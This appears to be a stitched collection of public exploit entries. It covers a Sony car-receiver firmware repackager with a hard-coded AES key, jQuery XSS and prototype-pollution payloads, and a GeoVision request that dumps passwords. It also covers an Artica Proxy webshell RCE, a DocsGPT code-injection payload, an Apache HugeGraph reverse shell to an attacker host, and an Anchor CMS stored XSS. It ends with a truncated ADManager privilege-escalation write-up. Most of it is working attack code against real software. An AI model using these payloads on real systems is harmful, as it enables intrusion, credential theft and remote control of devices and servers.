# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution
# Date: 11-Feb-2025
# Exploit Author: lkushinada
# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
# Software Link: https://archive.org/details/xav-ax-5500-v-113
# Version: 1.13
# Tested on: Sony XAV-AX5500
# CVE : CVE-2024-23922
# From NIST CVE Details:
# ====
# This vulnerability allows physically present attackers to execute arbitrary code on affected
# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
# vulnerability. The specific flaw exists within the handling of software updates. The issue
# results from the lack of proper validation of software update packages. An attacker can leverage
# this vulnerability to execute code in the context of the device.
# Was ZDI-CAN-22939
# ====
# # Summary
# Sony's firmware validation for a number of their XAV-AX products relies on symmetric cryptography,
# obscurity of their package format, and a weird checksum method instead of any real firmware
# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
# and allow a USB-based attacker to obtain RCE on the infotainment unit.
# What's not mentioned in the CVE advisories is that this method works on the majority of Sony's
# infotainment units and products which use a similar chipset or firmware package format. Tested
# to work on most firmware versions prior to v2.00.
# # Threat Model
# An attacker with physical access to an automotive media unit can typically utilize other methods
# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
# manner? if they are, how trivial is it to bypass?
# # Disclaimer
# The information in this article is for educational purposes only.
# Tampering with an automotive system comes with risks which, if you don't understand, you should
# not be undertaking.
# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
# FROM THE USE OF ANYTHING IN THIS DOCUMENT.
# # The Unit
# ## Processors
# - DAC
# - System Management Controller (SMC)
# - Applications Processor
# - Display Processor
# Coming from a mobile and desktop computer environment, one may be used to thinking about
# the Applications Processor as the most powerful chip in the system in terms of processing power,
# size, power consumption, and system hierarchy. The first oddity of this platform is that the
# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
# board.
# The application processor does not appear to be the orchestrator of the components on the system.
# The SMC takes the role of watchdog, power state management, and input (think remote
# controls, steering wheel button presses) routing.
# For our purposes, it is the Applications processor we're interested in, as it is
# the system responsible for updating the unit via USB.
# ## Interfaces
# We're going to be attacking the unit via USB, as it's the most readily exposed
# interface to owners and would-be attackers.
# Whilst the applications processor does have a UART interface, the most recent iterations of the
# unit do not expose any headers for debugging via UART, and the one active UART line found to be
# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
# documentation suggests these are not enabled, but this could not be verified during testing. At the
# very least, JTAG was not found to be exposed on an accessible interface.
# ## Storage
# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
# firmware was RAR-compressed. The contents of the SPI flash were analyzed to determine many of the
# details discussed in this report.
# ## The Updater
# Updates are provided on Sony's support website. A ZIP package is provided with three files:
# - SHDS1132.up6
# - SHMC1132.u88
# - SHSO1132.fir
# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:
# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# ## SPI Flash
# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
# 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................|
# 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R|
# 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
#
# 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.|
# 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
# ...
# 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 00778000
#
# Given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
# Decompressing the RARs at 0x2800 and 0x80000, we get the recovery and main applications.
# Once we remove the packaging bytes, seeing that the repetitive patterns align with runs of FFs
# gives us a strong indication that the encryption function is operating in an ECB-style
# configuration. That gives us an avenue, even if we do not recover the key, to potentially make
# modifications to the firmware, depending on how the checksum is being calculated.
# ## Firmware
# The recovery application contains the decompression, decryption and checksum methods.
# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
# we start taking a look at the relevant functions by way of:
# - looking for known strings (KRSELCO)
# - analyzing the logic and looking for obvious "if this passed, begin the update, else fail"
# - looking for things that look like encryption (loads of bitshifting math in one function)
# Of interest to us, there is:
# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
# - 0x02d4ce - the AES decryption function
# - 0x040dd4 - strcmp (?)
# - 0x040aa4 - memcpy (?)
# - 0x046490 - the vendor name plus the number an idiot would use for their luggage, followed by
# enough padding zeros to get us to a 16 byte key
# This gives us all the information we need, other than making some guesses as to the general package
# and header layout of the update package, to craft an update packager that allows arbitrary
# modification of the firmware.
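Two analyst-side checks drawn from the sections above, as an added example that is not part of the original advisory: the "repeated 16-byte block" tell that flags ECB mode, and a demonstration that the additive sum-mod-2^31 checksum is order-insensitive and therefore offers no integrity. The block function is a constructed keyed-hash stand-in (not AES) and the sample image sizes are made up.

```python
import hashlib
from collections import Counter

BLOCK_SIZE = 16


def sony_32(data: bytes) -> int:
    """Additive checksum as described in the post: sum of all bytes modulo 2^31."""
    return sum(data) % (1 << 31)


def repeated_blocks(data: bytes, block_size: int = BLOCK_SIZE) -> dict:
    """Count aligned blocks that occur more than once (the 'repeating patterns'
    spotted in the .fir hexdump)."""
    counts = Counter(
        data[i:i + block_size]
        for i in range(0, len(data) - block_size + 1, block_size)
    )
    return {block: n for block, n in counts.items() if n > 1}


def looks_like_ecb(data: bytes, block_size: int = BLOCK_SIZE, min_repeats: int = 4) -> bool:
    """Heuristic: a deterministic block cipher in ECB mode turns repeated plaintext
    blocks (e.g. runs of 0xFF erase padding) into identical ciphertext blocks."""
    return any(n >= min_repeats for n in repeated_blocks(data, block_size).values())


def _toy_block(key: bytes, block: bytes) -> bytes:
    """Constructed stand-in for a 16-byte block cipher (NOT AES): a keyed hash truncated
    to one block. It is deterministic per (key, block), which is all ECB's weakness needs."""
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]


def encrypt_ecb(key: bytes, plaintext: bytes) -> bytes:
    """ECB: every block is encrypted independently, so equal blocks stay equal."""
    return b"".join(
        _toy_block(key, plaintext[i:i + BLOCK_SIZE])
        for i in range(0, len(plaintext), BLOCK_SIZE)
    )


def encrypt_cbc(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Same toy block function with CBC chaining: each plaintext block is XORed with the
    previous ciphertext block first, so identical plaintext blocks no longer collide."""
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK_SIZE):
        mixed = bytes(a ^ b for a, b in zip(plaintext[i:i + BLOCK_SIZE], prev))
        prev = _toy_block(key, mixed)
        out.append(prev)
    return b"".join(out)


def make_sample_image() -> bytes:
    """Constructed firmware-like image: a varying body followed by 0xFF erase padding,
    mimicking the SPI layout in the post (the sizes are made up)."""
    body = bytes((i * 7 + 3) & 0xFF for i in range(8 * BLOCK_SIZE))
    padding = b"\xff" * (8 * BLOCK_SIZE)
    return body + padding


def checksum_collision_demo(image: bytes) -> dict:
    """Swap two bytes of the image: the additive checksum cannot tell, SHA-256 can."""
    tampered = bytearray(image)
    tampered[0], tampered[1] = tampered[1], tampered[0]
    tampered = bytes(tampered)
    return {
        "sum_equal": sony_32(image) == sony_32(tampered),
        "sha256_equal": hashlib.sha256(image).digest() == hashlib.sha256(tampered).digest(),
    }


if __name__ == "__main__":
    img = make_sample_image()
    key = b"constructed-key!"  # constructed, 16 bytes, not the device key
    print("ECB ciphertext looks like ECB:", looks_like_ecb(encrypt_ecb(key, img)))
    print("CBC ciphertext looks like ECB:", looks_like_ecb(encrypt_cbc(key, b"\x00" * 16, img)))
    print("checksum vs hash on a byte swap:", checksum_collision_demo(img))
```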
# # Proof of Concept
# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
# the update.
# ## Requirements
# - Unixish system
# - WinRar 2.0 (the version the Egyptians built the pyramids with)
# ## Usage
# cve-2024-23922.py path_to_winrar source.fir output.fir
import argparse
import sys
import os
import tempfile
import shutil
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

# Filenames as found in the .FIR
MAIN_BINARY_NAME = "main_16.bin"
MAIN_RAR_NAME = "main_16.rar"
DECRYPTED_FILE_NAME = "decrypt.bin"
ENCRYPTED_FILE_NAME = "encrypt.bin"

# Offsets in the .FIR
HEADER_LENGTH = 0x80
RECOVERY_OFFSET = 0x2800
MAIN_OFFSET = 0x80000
CHECKSUM_OFFSET = 0x800000 - 0x10
CHECKSUM_SIZE = 0x4
RAR_LENGTH_OFFSET = 0x4
RAR_LENGTH_SIZE = 0x4

# From 0x46490 in recovery_16.bin
ENCRYPTION_KEY = b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'


def decrypt_file(input_file, output_file):
    backend = default_backend()
    cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
    decryptor = cipher.decryptor()
    with open(input_file, 'rb') as file:
        ciphertext = file.read()
    # Strip the unencrypted header
    ciphertext = ciphertext[HEADER_LENGTH:]
    decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
    with open(output_file, 'wb') as file:
        file.write(decrypted_data)


def aes_encrypt_file(input_file, output_file):
    backend = default_backend()
    cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
    encryptor = cipher.encryptor()
    with open(input_file, 'rb') as file:
        plaintext = file.read()
    ciphertext = encryptor.update(plaintext) + encryptor.finalize()
    with open(output_file, 'wb') as file:
        file.write(ciphertext)


def get_sony_32(data):
    # Additive checksum: sum of all bytes, modulo 2^31
    csum = 0
    for i in data:
        csum = csum + i
    return csum % 2147483648  # 2^31


def validate_args(winrar_path, source_file, destination_file):
    # Check if the WinRAR executable exists and is a file
    if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
        print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
        sys.exit(1)
    # Check if the source file exists
    if not os.path.isfile(source_file):
        print(f"[x] Error: The specified source file '{source_file}' does not exist.")
        sys.exit(1)
    # Read 8 bytes from offset 0x10 in the source file
    try:
        with open(source_file, 'rb') as f:
            f.seek(0x10)
            signature = f.read(8)
            if signature != b'KRSELECO':
                print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
                sys.exit(1)
    except Exception as e:
        print(f"[x] Error: Failed to read from '{source_file}': {e}")
        sys.exit(1)
    # Check if the destination file already exists
    if os.path.exists(destination_file):
        print(f"[x] Error: The destination file '{destination_file}' already exists.")
        sys.exit(1)


def main():
    parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
    parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
    parser.add_argument("source_file", help="Path to original .FIR file")
    parser.add_argument("destination_file", help="Path to write the modified .FIR file to")
    args = parser.parse_args()
    validate_args(args.winrar_path, args.source_file, args.destination_file)
    RAR_2_PATH = args.winrar_path
    GOOD_FIRMWARE_FILE = args.source_file
    DESTINATION_FIRMWARE_FILE = args.destination_file

    # make temporary directory
    workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")
    # copy the good firmware file into the temp directory
    temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
    shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)

    print("[+] Cutting the head off and decrypting the contents")
    decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
    decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)

    print("[+] Dump out the rar file")
    with open(decrypted_file_path, 'rb') as file:
        # right before the rar file there is a 4 byte length header for the rar file. get that.
        file.seek(MAIN_OFFSET - RAR_LENGTH_OFFSET)
        original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
        rar_file_bytes = file.read(original_rar_length)
    # now dump that out
    rar_file_path = os.path.join(workdir, MAIN_RAR_NAME)
    with open(rar_file_path, 'wb') as rarfile:
        rarfile.write(rar_file_bytes)
    # check that the stat of the file matches what the header told us
    dumped_rar_size = os.stat(rar_file_path).st_size
    if dumped_rar_size != original_rar_length:
        print("[!] extracted file sizes don't match, there may be corruption", dumped_rar_size, original_rar_length)

    print("[+] Extracting the main binary from the rar file")
    os.system("unrar x " + rar_file_path + " " + workdir)
    print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
    print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
    input()
    print("[+] Continuing")

    print("[+] Putting your main binary back into the rar file")
    os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)
    # we could fix this by writing some FFs
    new_rar_size = os.stat(rar_file_path).st_size
    if dumped_rar_size > new_rar_size:
        print("[!!] The rar size is smaller than the old one. This might cause a problem.")
        print("[!!] Push any key to continue, ctrl+c to abort")
        input()

    with open(decrypted_file_path, 'r+b') as file:
        # right before the rar file there is a 4 byte length header for the rar file. go back there
        file.seek(MAIN_OFFSET - RAR_LENGTH_OFFSET)
        # overwrite the old size with the new size
        file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))
        print("[+] Deleting the old rar from the main container")
        # delete the old rar from the main container by FFing it up
        file.write(b'\xFF' * original_rar_length)
        # seek back to the start
        file.seek(MAIN_OFFSET)
        print("[+] Loading the new rar back into the main container")
        with open(rar_file_path, 'rb') as rarfile:
            new_rarfile_bytes = rarfile.read()
        file.write(new_rarfile_bytes)

    print("[+] Updating Checksum")
    with open(decrypted_file_path, 'rb') as file:
        contents = file.read()
    # everything except the trailing 16 bytes (where the checksum itself lives) is summed
    contents = contents[:-0x0010]
    s32_sum = get_sony_32(contents)
    with open(decrypted_file_path, 'r+b') as file:
        file.seek(CHECKSUM_OFFSET)
        # read out the current checksum
        old_checksum_bytes = file.read(CHECKSUM_SIZE)
        print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)
        # go back and update it with new checksum
        print("new checksum:", s32_sum, hex(s32_sum))
        new_checksum_bytes = s32_sum.to_bytes(CHECKSUM_SIZE, "big")
        file.seek(CHECKSUM_OFFSET)
        file.write(new_checksum_bytes)

    print("[+] Encrypting the main container back up")
    encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
    aes_encrypt_file(decrypted_file_path, encrypted_file_path)

    print("[+] Reattaching the main container to the header and writing to dest")
    with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
        with open(temp_fir_file, 'rb') as firfile:
            header = firfile.read(HEADER_LENGTH)
        file.write(header)
        with open(encrypted_file_path, 'rb') as encfile:
            enc_contents = encfile.read()
        file.write(enc_contents)

    print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
    input()
    shutil.rmtree(workdir)


if __name__ == "__main__":
    main()
# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
# Google Dork: N/A
# Date: 2025-02-13
# Exploit Author: xOryus
# Vendor Homepage: https://jquery.com
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
# Version: 3.3.1
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
# CVE : CVE-2019-11358, CVE-2020-7656
# Category: WebApps
# Description:
# This exploit abuses two vulnerabilities in jQuery:
# - CVE-2020-7656: XSS via improper script handling
# - CVE-2019-11358: Prototype Pollution leading to XSS
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
#
# Usage:
# 1. Load this script in a page that includes jQuery 3.3.1
# 2. Observe two XSS alerts via script injection and prototype pollution.
# PoC (Proof of Concept):
# ------------------------------------
/*
* Exploit for CVE-2020-7656 and CVE-2019-11358
* Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
*/
// COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
// 1. Load vulnerable jQuery (version 3.3.1)
const script = document.createElement('script');
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
document.head.appendChild(script);
// 2. Function to execute after jQuery is loaded
script.onload = function() {
    console.log("[+] Vulnerable jQuery loaded!");
    // 3. Inject malicious content for XSS (CVE-2020-7656)
    const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
    $('body').append(maliciousContent);
    console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
    // 4. Exploit Prototype Pollution (CVE-2019-11358)
    const defaultConfig = {
        "backLink": "<a href='https://example.com'>Go Back</a>"
    };
    const maliciousParams = {
        "__proto__": {
            "backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
        }
    };
    // 5. Merge objects using vulnerable $.extend
    let config = $.extend(true, defaultConfig, maliciousParams);
    console.log("[+] Prototype Pollution executed via $.extend().");
    // 6. Create a container to inject malicious content
    const container = document.createElement('div');
    container.id = 'backLinkContainer';
    document.body.appendChild(container);
    // 7. Inject malicious content into the DOM
    $('#backLinkContainer').html(config.backLink);
    console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
};
// 8. Instruction message
console.log("[*] Script injected. Waiting for jQuery to load...");
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902
Information disclosure vulnerability in the GeoVision GV-ASManager web application, version 6.1.0.0 or less.
Requirements
To perform a successful attack, an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (in some cases it is publicly accessible)
- Access to the Guest account (enabled by default), or any low-privilege account (Username: Guest; Password: <blank>)
Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low-privilege account is able to:
- Enumerate user accounts
- Retrieve the cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access resources such as monitoring cameras, access cards, parked cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras and access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reuse the retrieved password against other digital assets of the organization.
cURL script:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
--data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054
You can also find the exploit on my GitHub repo:
https://github.com/Madan301/CVE-2024-2054
import requests
import base64
import urllib3
from colorama import Fore

print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might "
      "sometimes vary from how artica proxy interface is hosted")
URL = input("Enter url: ")
if URL[-1] == "/":
    ACTUAL_URL = URL[:-1]
else:
    ACTUAL_URL = URL
ARTICA_URL = ACTUAL_URL


def check(ARTICA_URL):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        resp = requests.get(ARTICA_URL + '/wizard/wiz.upload.php', verify=False)
    except Exception as e:
        # the original fell through to an undefined name here; bail out instead
        print(Fore.RED + "Could not reach, check URL")
        return False
    if resp.status_code == 200:
        print(Fore.GREEN + "Vulnerable")
        return True
    else:
        print(Fore.RED + "Not Vulnerable")
        return False


def exploit(ARTICA_URL):
    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
    payload_data = {
        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
            "cache_serializer": "json",
            "cache_size": 999999999,
            "cache_data": {
                payload: {
                    "cache_date": 0,
                    "ttl": 999999999
                }
            }
        }
    }
    while True:
        PAYLOAD_CMD = input("enter command: ")
        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        response = requests.get(url, verify=False)
        if response.status_code == 200:
            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
            cmd_response = requests.get(cmd_url, verify=False)
            print(cmd_response.text)
        else:
            print("Failed to execute the payload")


is_vulnerable = check(ARTICA_URL=ACTUAL_URL)
if is_vulnerable:
    exploit(ARTICA_URL=ARTICA_URL)
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868
import requests

# TARGET CONFIG
TARGET = "http://10.0.2.15:7091"  # Change this

# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
    'user=1&source=reddit&name=other&data={"source":"reddit",'
    '"client_id":"1111","client_secret":1111,"user_agent":"111",'
    '"search_queries":[""],"number_posts":10,'
    '"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
    print(f"[+] Status Code: {response.status_code}")
    print("[+] Response Body:")
    print(response.text)
except Exception as e:
    print(f"[-] Error sending request: {e}")
# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-2024-27348
from requests import Request, Session
import sys
import json


def title():
    print('''
 ______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___
 / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ )
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |
 \____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/
[+] Reverse shell
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
''')


def exploit(url, lhost, lport):
    payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
    headers = {
        'Content-Type': 'application/json'}
    s = Session()
    url = url + "/gremlin"
    req = Request('POST', url, json=payload, headers=headers)
    prepped = req.prepare()
    del prepped.headers['Content-Type']
    resp = s.send(prepped,
                  verify=False,
                  timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.headers)
    print(payload)
    print(resp.status_code)
    print(resp.text)


if __name__ == '__main__':
    title()
    if len(sys.argv) < 4:
        print('[+] USAGE: python3 %s https://<target_url> lhost lport \n' % (sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n' % (sys.argv[0]))
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
        exit(0)
    else:
        exploit(sys.argv[1], sys.argv[2], sys.argv[3])
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
# Version: latest
# Tested on: MacOS
# Log in to Anchor CMS.
# Click on "Create New Post".
# Fill in the "Title" and enter the following payload in the field immediately below:
# "><script>alert()</script>
# Go to the homepage, and you will see the alert!
### PoC Request ###
POST /anchor/admin/posts/edit/2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta; anchorcms=hlko7b1dbdpjgn58himf2obht5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of Privilege Vulnerability
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/ad-manager/
# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
# Version: ADManager Plus Build < 7210
# Tested against: Build 7203
# CVE: CVE-2024-24409
# Description
Modify Computers is a predefined role in ADManager for managing
computers. If a technician user has the Modify Computers privilege
over a computer, they can change the userAccountControl and
msDS-AllowedToDelegateTo attributes of the computer object. In this
way, the technician user can set Constrained Kerberos Delegation over
any computer within the Organizational Unit that the user was
delegated.
Contrary to what ADManager claims, the user who has the Modify
Computers role can change the privileges of computer objects in
Active Directory. Constrained Kerberos Delegation can be set for
any service, such as the CIFS, LDAP or HOST services. The user can then
access these services by abusing the Constrained Kerberos Delegation.
In addition, Unconstrained Kerberos Delegation can be set over the
computer objects by changing the userAccountControl attribute.
Normally, only users that hold the SeEnableDelegationPrivilege privilege
can set constrained Kerberos delegation. Only members of the
BUILTIN\Administrators group have this privilege by default. The
delegated user for an Organizational Unit cannot set constrained
Kerberos delegation even if they have the GenericAll right over a
computer account, so the delegation process in Active Directory does
not grant this privilege. However, the technician user can effectively use
the SeEnableDelegationPrivilege right via the Modify Computers role.
# Vulnerability reasons
1. ADMP Web App Authorization issue: Assigning a predefined Modify
Computers role delegates the technician user to modify custom
attributes of computers unexpectedly. Even though it appears that this
privilege is not granted in the UI, the Additional Custom Attribute
property is assigned and this leads to broken access control
vulnerability.
2. There is no restriction for editing the userAccountControl and
msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
